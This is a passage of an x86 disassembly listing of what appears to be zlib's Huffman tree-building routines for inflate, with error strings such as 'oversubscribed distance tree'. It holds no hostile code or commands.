mov edx, [ebp+arg_4]
mov eax, [ebp+var_1C]
mov [edx+4], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
sub edx, [ecx]
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
add ecx, edx
mov edx, [ebp+arg_4]
mov [edx+8], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
mov [edx+34h], eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_409E20
add esp, 0Ch
jmp short loc_40C299
; ---------------------------------------------------------------------------
loc_40C235: ; CODE XREF: sub_40AF6D+6C�j
mov [ebp+arg_8], 0FFFFFFFEh
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_C]
mov [ecx+20h], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_14]
mov [eax+1Ch], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_1C]
mov [edx+4], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
sub edx, [ecx]
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
add ecx, edx
mov edx, [ebp+arg_4]
mov [edx+8], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
mov [edx+34h], eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_409E20
add esp, 0Ch
jmp short loc_40C299
; ---------------------------------------------------------------------------
loc_40C294: ; CODE XREF: sub_40AF6D:loc_40B271�j
; sub_40AF6D+487�j ...
jmp loc_40AFCD
; ---------------------------------------------------------------------------
loc_40C299: ; CODE XREF: sub_40AF6D+EB�j
; sub_40AF6D+238�j ...
mov esp, ebp
pop ebp
retn
sub_40AF6D endp
; ---------------------------------------------------------------------------
off_40C29D dd offset loc_40AFE9 ; DATA XREF: sub_40AF6D+75�r
dd offset loc_40B276
dd offset loc_40B3F9
dd offset loc_40B65E
dd offset loc_40B86D
dd offset loc_40BA7E
dd offset loc_40BF9F
dd offset loc_40C0AB
dd offset loc_40C174
dd offset loc_40C1D6
off_40C2C5 dd offset loc_40B0C4 ; DATA XREF: sub_40AF6D+150�r
dd offset loc_40B101
dd offset loc_40B1CA
dd offset loc_40B1EA
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C2D5 proc near ; CODE XREF: sub_40DA4C+3C�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_40ADBE
add esp, 0Ch
mov edx, [ebp+arg_0]
mov eax, [edx+28h]
push eax
mov ecx, [ebp+arg_4]
mov edx, [ecx+28h]
push edx
mov eax, [ebp+arg_4]
call dword ptr [eax+24h]
add esp, 8
mov ecx, [ebp+arg_0]
mov edx, [ecx+24h]
push edx
mov eax, [ebp+arg_4]
mov ecx, [eax+28h]
push ecx
mov edx, [ebp+arg_4]
call dword ptr [edx+24h]
add esp, 8
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+arg_4]
mov edx, [ecx+28h]
push edx
mov eax, [ebp+arg_4]
call dword ptr [eax+24h]
add esp, 8
xor eax, eax
pop ebp
retn
sub_40C2D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C330 proc near ; CODE XREF: sub_40CBFE+51�p
; sub_40CCA6+62�p ...
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
var_F8 = dword ptr -0F8h
var_F4 = dword ptr -0F4h
var_F0 = dword ptr -0F0h
var_EC = dword ptr -0ECh
var_E8 = dword ptr -0E8h
var_E4 = dword ptr -0E4h
var_E0 = dword ptr -0E0h
var_DC = dword ptr -0DCh
var_D8 = byte ptr -0D8h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_54 = dword ptr -54h
var_50 = byte ptr -50h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
push ebp
mov ebp, esp
sub esp, 108h
lea eax, [ebp+var_54]
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
mov dword ptr [ecx], 0
mov edx, [ebp+var_4]
add edx, 4
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
mov dword ptr [eax], 0
mov ecx, [ebp+var_4]
add ecx, 4
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
mov dword ptr [edx], 0
mov eax, [ebp+var_4]
add eax, 4
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
mov dword ptr [ecx], 0
mov edx, [ebp+var_4]
add edx, 4
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
mov dword ptr [eax], 0
mov ecx, [ebp+var_4]
add ecx, 4
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
mov dword ptr [edx], 0
mov eax, [ebp+var_4]
add eax, 4
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
mov dword ptr [ecx], 0
mov edx, [ebp+var_4]
add edx, 4
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
mov dword ptr [eax], 0
mov ecx, [ebp+var_4]
add ecx, 4
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
mov dword ptr [edx], 0
mov eax, [ebp+var_4]
add eax, 4
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
mov dword ptr [ecx], 0
mov edx, [ebp+var_4]
add edx, 4
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
mov dword ptr [eax], 0
mov ecx, [ebp+var_4]
add ecx, 4
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
mov dword ptr [edx], 0
mov eax, [ebp+var_4]
add eax, 4
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
mov dword ptr [ecx], 0
mov edx, [ebp+var_4]
add edx, 4
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
mov dword ptr [eax], 0
mov ecx, [ebp+var_4]
add ecx, 4
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
mov dword ptr [edx], 0
mov eax, [ebp+var_4]
add eax, 4
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
mov dword ptr [ecx], 0
mov edx, [ebp+var_4]
add edx, 4
mov [ebp+var_4], edx
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
mov ecx, [ebp+arg_4]
mov [ebp+var_EC], ecx
loc_40C46E: ; CODE XREF: sub_40C330+172�j
mov edx, [ebp+var_4]
mov eax, [edx]
mov ecx, [ebp+eax*4+var_54]
add ecx, 1
mov edx, [ebp+var_4]
mov eax, [edx]
mov [ebp+eax*4+var_54], ecx
mov ecx, [ebp+var_4]
add ecx, 4
mov [ebp+var_4], ecx
mov edx, [ebp+var_EC]
sub edx, 1
mov [ebp+var_EC], edx
cmp [ebp+var_EC], 0
jnz short loc_40C46E
mov eax, [ebp+var_54]
cmp eax, [ebp+arg_4]
jnz short loc_40C4C5
mov ecx, [ebp+arg_14]
mov dword ptr [ecx], 0
mov edx, [ebp+arg_18]
mov dword ptr [edx], 0
xor eax, eax
jmp loc_40CBFA
; ---------------------------------------------------------------------------
loc_40C4C5: ; CODE XREF: sub_40C330+17A�j
mov eax, [ebp+arg_18]
mov ecx, [eax]
mov [ebp+var_100], ecx
mov [ebp+var_F4], 1
jmp short loc_40C4EB
; ---------------------------------------------------------------------------
loc_40C4DC: ; CODE XREF: sub_40C330:loc_40C503�j
mov edx, [ebp+var_F4]
add edx, 1
mov [ebp+var_F4], edx
loc_40C4EB: ; CODE XREF: sub_40C330+1AA�j
cmp [ebp+var_F4], 0Fh
ja short loc_40C505
mov eax, [ebp+var_F4]
cmp [ebp+eax*4+var_54], 0
jz short loc_40C503
jmp short loc_40C505
; ---------------------------------------------------------------------------
loc_40C503: ; CODE XREF: sub_40C330+1CF�j
jmp short loc_40C4DC
; ---------------------------------------------------------------------------
loc_40C505: ; CODE XREF: sub_40C330+1C2�j
; sub_40C330+1D1�j
mov ecx, [ebp+var_F4]
mov [ebp+var_FC], ecx
mov edx, [ebp+var_100]
cmp edx, [ebp+var_F4]
jnb short loc_40C52B
mov eax, [ebp+var_F4]
mov [ebp+var_100], eax
loc_40C52B: ; CODE XREF: sub_40C330+1ED�j
mov [ebp+var_EC], 0Fh
jmp short loc_40C546
; ---------------------------------------------------------------------------
loc_40C537: ; CODE XREF: sub_40C330:loc_40C55E�j
mov ecx, [ebp+var_EC]
sub ecx, 1
mov [ebp+var_EC], ecx
loc_40C546: ; CODE XREF: sub_40C330+205�j
cmp [ebp+var_EC], 0
jz short loc_40C560
mov edx, [ebp+var_EC]
cmp [ebp+edx*4+var_54], 0
jz short loc_40C55E
jmp short loc_40C560
; ---------------------------------------------------------------------------
loc_40C55E: ; CODE XREF: sub_40C330+22A�j
jmp short loc_40C537
; ---------------------------------------------------------------------------
loc_40C560: ; CODE XREF: sub_40C330+21D�j
; sub_40C330+22C�j
mov eax, [ebp+var_EC]
mov [ebp+var_A0], eax
mov ecx, [ebp+var_100]
cmp ecx, [ebp+var_EC]
jbe short loc_40C586
mov edx, [ebp+var_EC]
mov [ebp+var_100], edx
loc_40C586: ; CODE XREF: sub_40C330+248�j
mov eax, [ebp+arg_18]
mov ecx, [ebp+var_100]
mov [eax], ecx
mov edx, 1
mov ecx, [ebp+var_F4]
shl edx, cl
mov [ebp+var_E8], edx
jmp short loc_40C5C3
; ---------------------------------------------------------------------------
loc_40C5A6: ; CODE XREF: sub_40C330:loc_40C5FA�j
mov eax, [ebp+var_F4]
add eax, 1
mov [ebp+var_F4], eax
mov ecx, [ebp+var_E8]
shl ecx, 1
mov [ebp+var_E8], ecx
loc_40C5C3: ; CODE XREF: sub_40C330+274�j
mov edx, [ebp+var_F4]
cmp edx, [ebp+var_EC]
jnb short loc_40C5FC
mov eax, [ebp+var_F4]
mov ecx, [ebp+var_E8]
sub ecx, [ebp+eax*4+var_54]
mov [ebp+var_E8], ecx
cmp [ebp+var_E8], 0
jge short loc_40C5FA
mov eax, 0FFFFFFFDh
jmp loc_40CBFA
; ---------------------------------------------------------------------------
loc_40C5FA: ; CODE XREF: sub_40C330+2BE�j
jmp short loc_40C5A6
; ---------------------------------------------------------------------------
loc_40C5FC: ; CODE XREF: sub_40C330+29F�j
mov edx, [ebp+var_EC]
mov eax, [ebp+var_E8]
sub eax, [ebp+edx*4+var_54]
mov [ebp+var_E8], eax
cmp [ebp+var_E8], 0
jge short loc_40C625
mov eax, 0FFFFFFFDh
jmp loc_40CBFA
; ---------------------------------------------------------------------------
loc_40C625: ; CODE XREF: sub_40C330+2E9�j
mov ecx, [ebp+var_EC]
mov edx, [ebp+ecx*4+var_54]
add edx, [ebp+var_E8]
mov eax, [ebp+var_EC]
mov [ebp+eax*4+var_54], edx
mov [ebp+var_F4], 0
mov ecx, [ebp+var_F4]
mov [ebp+var_DC], ecx
lea edx, [ebp+var_50]
mov [ebp+var_4], edx
lea eax, [ebp+var_D8]
mov [ebp+var_98], eax
loc_40C667: ; CODE XREF: sub_40C330+386�j
mov ecx, [ebp+var_EC]
sub ecx, 1
mov [ebp+var_EC], ecx
cmp [ebp+var_EC], 0
jz short loc_40C6B8
mov edx, [ebp+var_4]
mov eax, [ebp+var_F4]
add eax, [edx]
mov [ebp+var_F4], eax
mov ecx, [ebp+var_98]
mov edx, [ebp+var_F4]
mov [ecx], edx
mov eax, [ebp+var_98]
add eax, 4
mov [ebp+var_98], eax
mov ecx, [ebp+var_4]
add ecx, 4
mov [ebp+var_4], ecx
jmp short loc_40C667
; ---------------------------------------------------------------------------
loc_40C6B8: ; CODE XREF: sub_40C330+34D�j
mov edx, [ebp+arg_0]
mov [ebp+var_4], edx
mov [ebp+var_EC], 0
loc_40C6C8: ; CODE XREF: sub_40C330+404�j
mov eax, [ebp+var_4]
mov ecx, [eax]
mov [ebp+var_F4], ecx
mov edx, [ebp+var_F4]
mov eax, [ebp+var_4]
add eax, 4
mov [ebp+var_4], eax
test edx, edx
jz short loc_40C71C
mov ecx, [ebp+var_F4]
mov edx, [ebp+ecx*4+var_E0]
mov eax, [ebp+arg_24]
mov ecx, [ebp+var_EC]
mov [eax+edx*4], ecx
mov edx, [ebp+var_F4]
mov eax, [ebp+edx*4+var_E0]
add eax, 1
mov ecx, [ebp+var_F4]
mov [ebp+ecx*4+var_E0], eax
loc_40C71C: ; CODE XREF: sub_40C330+3B4�j
mov edx, [ebp+var_EC]
add edx, 1
mov [ebp+var_EC], edx
mov eax, [ebp+var_EC]
cmp eax, [ebp+arg_4]
jb short loc_40C6C8
mov ecx, [ebp+var_A0]
mov edx, [ebp+ecx*4+var_E0]
mov [ebp+arg_4], edx
mov [ebp+var_EC], 0
mov eax, [ebp+var_EC]
mov [ebp+var_E0], eax
mov ecx, [ebp+arg_24]
mov [ebp+var_4], ecx
mov [ebp+var_E4], 0FFFFFFFFh
mov edx, [ebp+var_100]
neg edx
mov [ebp+var_9C], edx
mov [ebp+var_90], 0
mov [ebp+var_8], 0
mov [ebp+var_F0], 0
jmp short loc_40C7A6
; ---------------------------------------------------------------------------
loc_40C797: ; CODE XREF: sub_40C330:loc_40CBC7�j
mov eax, [ebp+var_FC]
add eax, 1
mov [ebp+var_FC], eax
loc_40C7A6: ; CODE XREF: sub_40C330+465�j
mov ecx, [ebp+var_FC]
cmp ecx, [ebp+var_A0]
jg loc_40CBCC
mov edx, [ebp+var_FC]
mov eax, [ebp+edx*4+var_54]
mov [ebp+var_C], eax
loc_40C7C5: ; CODE XREF: sub_40C330:loc_40CBC2�j
mov ecx, [ebp+var_C]
mov edx, [ebp+var_C]
sub edx, 1
mov [ebp+var_C], edx
test ecx, ecx
jz loc_40CBC7
loc_40C7D9: ; CODE XREF: sub_40C330:loc_40CA0F�j
mov eax, [ebp+var_9C]
add eax, [ebp+var_100]
cmp [ebp+var_FC], eax
jle loc_40CA14
mov ecx, [ebp+var_E4]
add ecx, 1
mov [ebp+var_E4], ecx
mov edx, [ebp+var_9C]
add edx, [ebp+var_100]
mov [ebp+var_9C], edx
mov eax, [ebp+var_A0]
sub eax, [ebp+var_9C]
mov [ebp+var_F0], eax
mov ecx, [ebp+var_F0]
cmp ecx, [ebp+var_100]
jbe short loc_40C840
mov edx, [ebp+var_100]
mov [ebp+var_104], edx
jmp short loc_40C84C
; ---------------------------------------------------------------------------
loc_40C840: ; CODE XREF: sub_40C330+500�j
mov eax, [ebp+var_F0]
mov [ebp+var_104], eax
loc_40C84C: ; CODE XREF: sub_40C330+50E�j
mov ecx, [ebp+var_104]
mov [ebp+var_F0], ecx
mov edx, [ebp+var_FC]
sub edx, [ebp+var_9C]
mov [ebp+var_F4], edx
mov eax, 1
mov ecx, [ebp+var_F4]
shl eax, cl
mov [ebp+var_94], eax
mov ecx, [ebp+var_C]
add ecx, 1
cmp [ebp+var_94], ecx
jbe loc_40C923
mov edx, [ebp+var_C]
add edx, 1
mov eax, [ebp+var_94]
sub eax, edx
mov [ebp+var_94], eax
mov ecx, [ebp+var_FC]
lea edx, [ebp+ecx*4+var_54]
mov [ebp+var_98], edx
mov eax, [ebp+var_F4]
cmp eax, [ebp+var_F0]
jnb short loc_40C923
loc_40C8C1: ; CODE XREF: sub_40C330+5F1�j
mov ecx, [ebp+var_F4]
add ecx, 1
mov [ebp+var_F4], ecx
mov edx, [ebp+var_F4]
cmp edx, [ebp+var_F0]
jnb short loc_40C923
mov eax, [ebp+var_94]
shl eax, 1
mov [ebp+var_94], eax
mov ecx, [ebp+var_98]
add ecx, 4
mov [ebp+var_98], ecx
mov edx, [ebp+var_98]
mov eax, [ebp+var_94]
cmp eax, [edx]
ja short loc_40C90D
jmp short loc_40C923
; ---------------------------------------------------------------------------
loc_40C90D: ; CODE XREF: sub_40C330+5D9�j
mov ecx, [ebp+var_98]
mov edx, [ebp+var_94]
sub edx, [ecx]
mov [ebp+var_94], edx
jmp short loc_40C8C1
; ---------------------------------------------------------------------------
loc_40C923: ; CODE XREF: sub_40C330+559�j
; sub_40C330+58F�j ...
mov eax, 1
mov ecx, [ebp+var_F4]
shl eax, cl
mov [ebp+var_F0], eax
mov ecx, [ebp+arg_20]
mov edx, [ecx]
add edx, [ebp+var_F0]
cmp edx, 5A0h
jbe short loc_40C953
mov eax, 0FFFFFFFCh
jmp loc_40CBFA
; ---------------------------------------------------------------------------
loc_40C953: ; CODE XREF: sub_40C330+617�j
mov eax, [ebp+arg_20]
mov ecx, [eax]
mov edx, [ebp+arg_1C]
lea eax, [edx+ecx*8]
mov [ebp+var_8], eax
mov ecx, [ebp+var_E4]
mov edx, [ebp+var_8]
mov [ebp+ecx*4+var_90], edx
mov eax, [ebp+arg_20]
mov ecx, [eax]
add ecx, [ebp+var_F0]
mov edx, [ebp+arg_20]
mov [edx], ecx
cmp [ebp+var_E4], 0
jz short loc_40CA07
mov eax, [ebp+var_E4]
mov ecx, [ebp+var_EC]
mov [ebp+eax*4+var_E0], ecx
mov dl, byte ptr [ebp+var_100]
mov byte ptr [ebp+var_14+1], dl
mov al, byte ptr [ebp+var_F4]
mov byte ptr [ebp+var_14], al
mov ecx, [ebp+var_9C]
sub ecx, [ebp+var_100]
mov edx, [ebp+var_EC]
shr edx, cl
mov [ebp+var_F4], edx
mov eax, [ebp+var_E4]
mov ecx, [ebp+var_8]
sub ecx, [ebp+eax*4+var_94]
sar ecx, 3
sub ecx, [ebp+var_F4]
mov [ebp+var_10], ecx
mov edx, [ebp+var_E4]
mov eax, [ebp+edx*4+var_94]
mov ecx, [ebp+var_F4]
mov edx, [ebp+var_14]
mov [eax+ecx*8], edx
mov edx, [ebp+var_10]
mov [eax+ecx*8+4], edx
jmp short loc_40CA0F
; ---------------------------------------------------------------------------
loc_40CA07: ; CODE XREF: sub_40C330+658�j
mov eax, [ebp+arg_14]
mov ecx, [ebp+var_8]
mov [eax], ecx
loc_40CA0F: ; CODE XREF: sub_40C330+6D5�j
jmp loc_40C7D9
; ---------------------------------------------------------------------------
loc_40CA14: ; CODE XREF: sub_40C330+4BB�j
mov edx, [ebp+var_FC]
sub edx, [ebp+var_9C]
mov byte ptr [ebp+var_14+1], dl
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_24]
lea edx, [ecx+eax*4]
cmp [ebp+var_4], edx
jb short loc_40CA37
mov byte ptr [ebp+var_14], 0C0h
jmp short loc_40CA95
; ---------------------------------------------------------------------------
loc_40CA37: ; CODE XREF: sub_40C330+6FF�j
mov eax, [ebp+var_4]
mov ecx, [eax]
cmp ecx, [ebp+arg_8]
jnb short loc_40CA67
mov edx, [ebp+var_4]
cmp dword ptr [edx], 100h
sbb eax, eax
and al, 0A0h
add eax, 60h
mov byte ptr [ebp+var_14], al
mov ecx, [ebp+var_4]
mov edx, [ecx]
mov [ebp+var_10], edx
mov eax, [ebp+var_4]
add eax, 4
mov [ebp+var_4], eax
jmp short loc_40CA95
; ---------------------------------------------------------------------------
loc_40CA67: ; CODE XREF: sub_40C330+70F�j
mov ecx, [ebp+var_4]
mov edx, [ecx]
sub edx, [ebp+arg_8]
mov eax, [ebp+arg_10]
mov ecx, [eax+edx*4]
add ecx, 50h
mov byte ptr [ebp+var_14], cl
mov edx, [ebp+var_4]
mov eax, [edx]
sub eax, [ebp+arg_8]
mov ecx, [ebp+arg_C]
mov edx, [ecx+eax*4]
mov [ebp+var_10], edx
mov eax, [ebp+var_4]
add eax, 4
mov [ebp+var_4], eax
loc_40CA95: ; CODE XREF: sub_40C330+705�j
; sub_40C330+735�j
mov ecx, [ebp+var_FC]
sub ecx, [ebp+var_9C]
mov edx, 1
shl edx, cl
mov [ebp+var_94], edx
mov eax, [ebp+var_EC]
mov ecx, [ebp+var_9C]
shr eax, cl
mov [ebp+var_F4], eax
jmp short loc_40CAD6
; ---------------------------------------------------------------------------
loc_40CAC4: ; CODE XREF: sub_40C330+7CA�j
mov ecx, [ebp+var_F4]
add ecx, [ebp+var_94]
mov [ebp+var_F4], ecx
loc_40CAD6: ; CODE XREF: sub_40C330+792�j
mov edx, [ebp+var_F4]
cmp edx, [ebp+var_F0]
jnb short loc_40CAFC
mov eax, [ebp+var_F4]
mov ecx, [ebp+var_8]
mov edx, [ebp+var_14]
mov [ecx+eax*8], edx
mov edx, [ebp+var_10]
mov [ecx+eax*8+4], edx
jmp short loc_40CAC4
; ---------------------------------------------------------------------------
loc_40CAFC: ; CODE XREF: sub_40C330+7B2�j
mov ecx, [ebp+var_FC]
sub ecx, 1
mov eax, 1
shl eax, cl
mov [ebp+var_F4], eax
jmp short loc_40CB22
; ---------------------------------------------------------------------------
loc_40CB14: ; CODE XREF: sub_40C330+814�j
mov ecx, [ebp+var_F4]
shr ecx, 1
mov [ebp+var_F4], ecx
loc_40CB22: ; CODE XREF: sub_40C330+7E2�j
mov edx, [ebp+var_EC]
and edx, [ebp+var_F4]
test edx, edx
jz short loc_40CB46
mov eax, [ebp+var_EC]
xor eax, [ebp+var_F4]
mov [ebp+var_EC], eax
jmp short loc_40CB14
; ---------------------------------------------------------------------------
loc_40CB46: ; CODE XREF: sub_40C330+800�j
mov ecx, [ebp+var_EC]
xor ecx, [ebp+var_F4]
mov [ebp+var_EC], ecx
mov edx, 1
mov ecx, [ebp+var_9C]
shl edx, cl
sub edx, 1
mov [ebp+var_F8], edx
loc_40CB6E: ; CODE XREF: sub_40C330+890�j
mov eax, [ebp+var_EC]
and eax, [ebp+var_F8]
mov ecx, [ebp+var_E4]
cmp eax, [ebp+ecx*4+var_E0]
jz short loc_40CBC2
mov edx, [ebp+var_E4]
sub edx, 1
mov [ebp+var_E4], edx
mov eax, [ebp+var_9C]
sub eax, [ebp+var_100]
mov [ebp+var_9C], eax
mov edx, 1
mov ecx, [ebp+var_9C]
shl edx, cl
sub edx, 1
mov [ebp+var_F8], edx
jmp short loc_40CB6E
; ---------------------------------------------------------------------------
loc_40CBC2: ; CODE XREF: sub_40C330+857�j
jmp loc_40C7C5
; ---------------------------------------------------------------------------
loc_40CBC7: ; CODE XREF: sub_40C330+4A3�j
jmp loc_40C797
; ---------------------------------------------------------------------------
loc_40CBCC: ; CODE XREF: sub_40C330+482�j
cmp [ebp+var_E8], 0
jz short loc_40CBEA
cmp [ebp+var_A0], 1
jz short loc_40CBEA
mov [ebp+var_108], 0FFFFFFFBh
jmp short loc_40CBF4
; ---------------------------------------------------------------------------
loc_40CBEA: ; CODE XREF: sub_40C330+8A3�j
; sub_40C330+8AC�j
mov [ebp+var_108], 0
loc_40CBF4: ; CODE XREF: sub_40C330+8B8�j
mov eax, [ebp+var_108]
loc_40CBFA: ; CODE XREF: sub_40C330+190�j
; sub_40C330+2C5�j ...
mov esp, ebp
pop ebp
retn
sub_40C330 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CBFE proc near ; CODE XREF: sub_40AF6D+A62�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_8], 0
push 4
push 13h
mov eax, [ebp+arg_10]
mov ecx, [eax+28h]
push ecx
mov edx, [ebp+arg_10]
call dword ptr [edx+20h]
add esp, 0Ch
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_40CC2F
mov eax, 0FFFFFFFCh
jmp short loc_40CCA2
; ---------------------------------------------------------------------------
loc_40CC2F: ; CODE XREF: sub_40CBFE+28�j
mov eax, [ebp+var_C]
push eax
lea ecx, [ebp+var_8]
push ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_8]
push ecx
push 0
push 0
push 13h
push 13h
mov edx, [ebp+arg_0]
push edx
call sub_40C330
add esp, 28h
mov [ebp+var_4], eax
cmp [ebp+var_4], 0FFFFFFFDh
jnz short loc_40CC6C
mov eax, [ebp+arg_10]
mov dword ptr [eax+18h], offset aOversubscribed ; "oversubscribed dynamic bit lengths tree"...
jmp short loc_40CC8B
; ---------------------------------------------------------------------------
loc_40CC6C: ; CODE XREF: sub_40CBFE+60�j
cmp [ebp+var_4], 0FFFFFFFBh
jz short loc_40CC7A
mov ecx, [ebp+arg_4]
cmp dword ptr [ecx], 0
jnz short loc_40CC8B
loc_40CC7A: ; CODE XREF: sub_40CBFE+72�j
mov edx, [ebp+arg_10]
mov dword ptr [edx+18h], offset aIncompleteDyna ; "incomplete dynamic bit lengths tree"
mov [ebp+var_4], 0FFFFFFFDh
loc_40CC8B: ; CODE XREF: sub_40CBFE+6C�j
; sub_40CBFE+7A�j
mov eax, [ebp+var_C]
push eax
mov ecx, [ebp+arg_10]
mov edx, [ecx+28h]
push edx
mov eax, [ebp+arg_10]
call dword ptr [eax+24h]
add esp, 8
mov eax, [ebp+var_4]
loc_40CCA2: ; CODE XREF: sub_40CBFE+2F�j
mov esp, ebp
pop ebp
retn
sub_40CBFE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CCA6 proc near ; CODE XREF: sub_40AF6D+F01�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_8], 0
push 4
push 120h
mov eax, [ebp+arg_20]
mov ecx, [eax+28h]
push ecx
mov edx, [ebp+arg_20]
call dword ptr [edx+20h]
add esp, 0Ch
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_40CCDD
mov eax, 0FFFFFFFCh
jmp loc_40CE27
; ---------------------------------------------------------------------------
loc_40CCDD: ; CODE XREF: sub_40CCA6+2B�j
mov eax, [ebp+var_C]
push eax
lea ecx, [ebp+var_8]
push ecx
mov edx, [ebp+arg_1C]
push edx
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_14]
push ecx
push offset dword_414538
push offset dword_4144BC
push 101h
mov edx, [ebp+arg_0]
push edx
mov eax, [ebp+arg_8]
push eax
call sub_40C330
add esp, 28h
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40CD21
mov ecx, [ebp+arg_C]
cmp dword ptr [ecx], 0
jnz short loc_40CD66
loc_40CD21: ; CODE XREF: sub_40CCA6+71�j
cmp [ebp+var_4], 0FFFFFFFDh
jnz short loc_40CD33
mov edx, [ebp+arg_20]
mov dword ptr [edx+18h], offset aOversubscrib_0 ; "oversubscribed literal/length tree"
jmp short loc_40CD4A
; ---------------------------------------------------------------------------
loc_40CD33: ; CODE XREF: sub_40CCA6+7F�j
cmp [ebp+var_4], 0FFFFFFFCh
jz short loc_40CD4A
mov eax, [ebp+arg_20]
mov dword ptr [eax+18h], offset aIncompleteLite ; "incomplete literal/length tree"
mov [ebp+var_4], 0FFFFFFFDh
loc_40CD4A: ; CODE XREF: sub_40CCA6+8B�j
; sub_40CCA6+91�j
mov ecx, [ebp+var_C]
push ecx
mov edx, [ebp+arg_20]
mov eax, [edx+28h]
push eax
mov ecx, [ebp+arg_20]
call dword ptr [ecx+24h]
add esp, 8
mov eax, [ebp+var_4]
jmp loc_40CE27
; ---------------------------------------------------------------------------
loc_40CD66: ; CODE XREF: sub_40CCA6+79�j
mov edx, [ebp+var_C]
push edx
lea eax, [ebp+var_8]
push eax
mov ecx, [ebp+arg_1C]
push ecx
mov edx, [ebp+arg_10]
push edx
mov eax, [ebp+arg_18]
push eax
push offset dword_41462C
push offset dword_4145B4
push 0
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+arg_8]
lea ecx, [eax+edx*4]
push ecx
call sub_40C330
add esp, 28h
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40CDB6
mov edx, [ebp+arg_10]
cmp dword ptr [edx], 0
jnz short loc_40CE11
cmp [ebp+arg_0], 101h
jbe short loc_40CE11
loc_40CDB6: ; CODE XREF: sub_40CCA6+FD�j
cmp [ebp+var_4], 0FFFFFFFDh
jnz short loc_40CDC8
mov eax, [ebp+arg_20]
mov dword ptr [eax+18h], offset aOversubscrib_1 ; "oversubscribed distance tree"
jmp short loc_40CDF8
; ---------------------------------------------------------------------------
loc_40CDC8: ; CODE XREF: sub_40CCA6+114�j
cmp [ebp+var_4], 0FFFFFFFBh
jnz short loc_40CDE1
mov ecx, [ebp+arg_20]
mov dword ptr [ecx+18h], offset aIncompleteDist ; "incomplete distance tree"
mov [ebp+var_4], 0FFFFFFFDh
jmp short loc_40CDF8
; ---------------------------------------------------------------------------
loc_40CDE1: ; CODE XREF: sub_40CCA6+126�j
cmp [ebp+var_4], 0FFFFFFFCh
jz short loc_40CDF8
mov edx, [ebp+arg_20]
mov dword ptr [edx+18h], offset aEmptyDistanceT ; "empty distance tree with lengths"
mov [ebp+var_4], 0FFFFFFFDh
